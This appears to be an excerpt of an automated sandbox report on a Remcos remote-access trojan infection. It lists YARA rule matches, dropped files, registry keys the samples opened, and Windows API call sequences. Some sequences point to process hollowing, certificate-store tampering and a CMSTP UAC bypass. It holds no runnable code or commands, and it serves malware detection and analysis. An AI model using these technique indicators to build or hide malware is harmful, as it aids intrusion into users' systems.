Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\Public\kn.exe

Code function: 25_2_00007FF67DEE60BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,

25_2_00007FF67DEE60BC

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0C9E2 SystemParametersInfoW,		28_2_1BA0C9E2
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107C9E2 SystemParametersInfoW,		36_2_2107C9E2

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell			Jump to behavior

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System			Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell			Jump to behavior

Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,		25_2_00007FF67DE5F9B8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,		25_2_00007FF67DE6FC20
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,		25_2_00007FF67DF098B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,		25_2_00007FF67DEC184C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		25_2_00007FF67DF093A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED342C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357,		25_2_00007FF67DED0EF4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360,		25_2_00007FF67DF06EA8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,		25_2_00007FF67DEC0F58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,		25_2_00007FF67DEBEA7C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,		25_2_00007FF67DE929A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,		25_2_00007FF67DF0A740
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,		25_2_00007FF67DE925E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,		25_2_00007FF67DECE1F8

System Summary

Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Users\Public\Libraries\sppsvc.pif

Process Stats: CPU usage > 49%

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken,		4_2_00007FF789BD89E4
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,		4_2_00007FF789BC3D94
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD898C NtQueryInformationToken,		4_2_00007FF789BD898C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,		4_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,		4_2_00007FF789BEBCF0
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,		4_2_00007FF789BD8114
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,		4_2_00007FF789BD88C0
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,		4_2_00007FF789BD7FF8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken,		6_2_00007FF789BD89E4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,		6_2_00007FF789BC3D94
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD898C NtQueryInformationToken,		6_2_00007FF789BD898C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,		6_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,		6_2_00007FF789BEBCF0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,		6_2_00007FF789BD8114
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,		6_2_00007FF789BD88C0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,		6_2_00007FF789BD7FF8
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655889890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,		14_2_00007FF655889890
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF2C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,		25_2_00007FF67DF2C964
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028AC2D8 NtCreateFile,NtWriteFile,		28_2_028AC2D8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028AC3BC NtOpenFile,NtReadFile,NtClose,		28_2_028AC3BC
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A78E0 NtAllocateVirtualMemory,		28_2_028A78E0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028AC2D6 NtCreateFile,NtWriteFile,		28_2_028AC2D6
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A78DE NtAllocateVirtualMemory,		28_2_028A78DE
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0BB35 OpenProcess,NtResumeProcess,CloseHandle,		28_2_1BA0BB35
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0BB09 OpenProcess,NtSuspendProcess,CloseHandle,		28_2_1BA0BB09
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA032D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,		28_2_1BA032D2
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA0D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,		28_2_1BA0D58F
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,		29_2_00007FF789BD8114
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,		29_2_00007FF789BD7FF8
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken,		29_2_00007FF789BD89E4
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,		29_2_00007FF789BC3D94
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD898C NtQueryInformationToken,		29_2_00007FF789BD898C
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,		29_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,		29_2_00007FF789BEBCF0
Source: C:\Users\Public\alpha.exe	Code function: 29_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,		29_2_00007FF789BD88C0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029BC3BC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,		36_2_029BC3BC
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029B78E0 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,		36_2_029B78E0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029BC2D8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,		36_2_029BC2D8
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029BC2D6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,		36_2_029BC2D6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029B7A38 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,		36_2_029B7A38
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029B78DE GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,		36_2_029B78DE
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029B7EBE CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,		36_2_029B7EBE
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_029B7EC0 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,		36_2_029B7EC0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210732D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,		36_2_210732D2
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107BB09 OpenProcess,NtSuspendProcess,CloseHandle,		36_2_2107BB09
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2107BB35 OpenProcess,NtResumeProcess,CloseHandle,		36_2_2107BB35

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BC5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,

4_2_00007FF789BC5240

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF789BD4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,

4_2_00007FF789BD4224

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA067B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,		28_2_1BA067B9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_210767B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		36_2_210767B4

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD0A6C		4_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD4224		4_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BCAA54		4_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD5554		4_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD37D8		4_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC6EE4		4_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BE7F00		4_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BCE680		4_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BEEE88		4_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC2220		4_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC4A30		4_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BEAA30		4_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC5240		4_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC7650		4_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BCD250		4_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC9E50		4_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC8DF8		4_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BCCE10		4_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC81D4		4_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BED9D0		4_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC7D30		4_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BF1538		4_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BCB0D8		4_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC8510		4_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD18D4		4_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC1884		4_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD7854		4_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC2C48		4_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BEAC4C		4_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC6BE0		4_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC3410		4_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BEAFBC		4_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC5B70		4_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC3F90		4_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC372C		4_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BC9B50		4_2_00007FF789BC9B50
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD0A6C		6_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD4224		6_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BCAA54		6_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD5554		6_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD37D8		6_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC6EE4		6_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BE7F00		6_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BCE680		6_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BEEE88		6_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC2220		6_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC4A30		6_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BEAA30		6_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC5240		6_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC7650		6_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BCD250		6_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC9E50		6_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC8DF8		6_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BCCE10		6_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC81D4		6_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BED9D0		6_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC7D30		6_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BF1538		6_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BCB0D8		6_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC8510		6_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD18D4		6_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC1884		6_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BD7854		6_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC2C48		6_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BEAC4C		6_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC6BE0		6_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC3410		6_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BEAFBC		6_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC5B70		6_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC3F90		6_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC372C		6_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF789BC9B50		6_2_00007FF789BC9B50
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655886054		14_2_00007FF655886054
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF65588596C		14_2_00007FF65588596C
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655881664		14_2_00007FF655881664
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655886EC8		14_2_00007FF655886EC8
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF6558872C0		14_2_00007FF6558872C0
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655886AE8		14_2_00007FF655886AE8
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF6558883D8		14_2_00007FF6558883D8
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655885128		14_2_00007FF655885128
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655884318		14_2_00007FF655884318
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655884050		14_2_00007FF655884050
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655889C74		14_2_00007FF655889C74
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655887670		14_2_00007FF655887670
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655882D70		14_2_00007FF655882D70
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655889890		14_2_00007FF655889890
Source: C:\Users\Public\ger.exe	Code function: 14_2_00007FF655887C7C		14_2_00007FF655887C7C
